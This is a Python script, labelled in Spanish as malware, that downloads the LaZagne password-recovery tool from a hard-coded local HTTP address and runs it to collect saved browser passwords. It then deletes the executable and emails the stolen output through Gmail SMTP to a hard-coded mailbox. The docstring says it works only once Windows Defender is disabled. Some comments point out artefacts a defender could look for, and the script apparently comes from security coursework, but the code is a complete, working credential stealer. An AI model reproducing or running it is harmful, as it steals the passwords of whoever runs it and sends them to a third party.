#!/usr/bin/env python3
|
|
"""
|
|
Malware - LaZagne
|
|
|
|
LaZagne.exe https://github.com/AlessandroZ/LaZagne
|
|
|
|
Este virus no se puede ejecutar con el Windows Defender activado.
|
|
|
|
Si lo desactivamos, LaZagne recogerá las contraseñas de los navegadores y las
enviará por correo.
|
|
|
|
Algunas librerías necesitarán instalación si se ejecuta con python directamente.
|
|
|
|
"""
|
|
|
|
import dotenv
|
|
import os
|
|
import requests
|
|
import subprocess
|
|
import smtplib
|
|
import tempfile
|
|
from email.mime.text import MIMEText
|
|
|
|
|
|
def run_command(command):
    """
    Run a command line through the system shell and return its output as text.

    The string is handed to the shell unmodified (shell=True), so it must
    never be assembled from untrusted input. Only stdout is captured, and a
    non-zero exit status raises subprocess.CalledProcessError.
    """
    raw_output = subprocess.check_output(command, shell=True)
    # The code page is hard-coded; presumably chosen to match a Western
    # European Windows console -- confirm against the host it runs on.
    decoded_text = raw_output.decode('cp850')
    return decoded_text
|
|
|
|
|
|
def send_email(subject, body, sender, recipients, password):
    """
    Send a plain-text report by email through smtp.gmail.com on port 465.

    `recipients` is an iterable of addresses; it is joined into the To
    header and also passed to the SMTP envelope. `sender` doubles as the
    login name and `password` is the credential used to authenticate.

    Defender note: the only network activity here is an implicit-TLS SMTP
    session to smtp.gmail.com:465, so outbound SMTPS from a workstation
    process is the egress signal to look for.
    """
    message = MIMEText(body)
    header_values = {
        'Subject': subject,
        'From': sender,
        'To': ', '.join(recipients),
    }
    # Headers are set in the same order as before: Subject, From, To.
    for header_name, header_value in header_values.items():
        message[header_name] = header_value

    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as connection:
        connection.login(sender, password)
        connection.sendmail(sender, recipients, message.as_string())

    print(f"[i] Email sent Successfully!\n")
|
|
|
|
|
|
def download_and_execute_lazagne():
    """
    Fetch LaZagne.exe, run it with the "browsers" argument and return its output.

    The text returned is whatever run_command() captured from the tool.

    Defender note: the sequence below leaves several observable artefacts --
    a plain-HTTP GET for an .exe, an executable written into a freshly
    created temporary directory, a child process spawned through the shell,
    and deletion of that executable right after it exits.
    """

    # Unencrypted HTTP download from a hard-coded RFC 1918 (private) address;
    # the whole response body is held in memory as r.content.
    r = requests.get("http://192.168.1.120/LaZagne.exe")

    # mkdtemp() creates a new directory; the name temp_file is a directory path.
    temp_file = tempfile.mkdtemp()

    # Changes the working directory of the whole process, not just this call.
    os.chdir(temp_file)

    with open("LaZagne.exe", "wb") as f:

        f.write(r.content)

    # Resolved relative to the working directory set above.
    lazagne_output = run_command("LaZagne.exe browsers")

    # Only the file is removed; the temporary directory itself is not.
    os.remove("LaZagne.exe")

    return lazagne_output
|
|
|
|
|
|
if __name__ == '__main__':

    # Collection happens first; the result is the text mailed below.
    output = download_and_execute_lazagne()

    # The mailbox credential is not hard-coded: it is read from the
    # APP_PASSWD environment variable, which load_dotenv() may populate
    # from a .env file.
    dotenv.load_dotenv()
    app_passwd = os.getenv("APP_PASSWD")

    # Sender and the single recipient are the same mailbox. The fixed
    # subject line and address are stable strings a defender can search
    # for in mail or proxy logs.
    send_email(
        "LaZagne Browser INFO",
        output,
        "keyloggerseginf@gmail.com",
        ["keyloggerseginf@gmail.com"],
        app_passwd
    )
|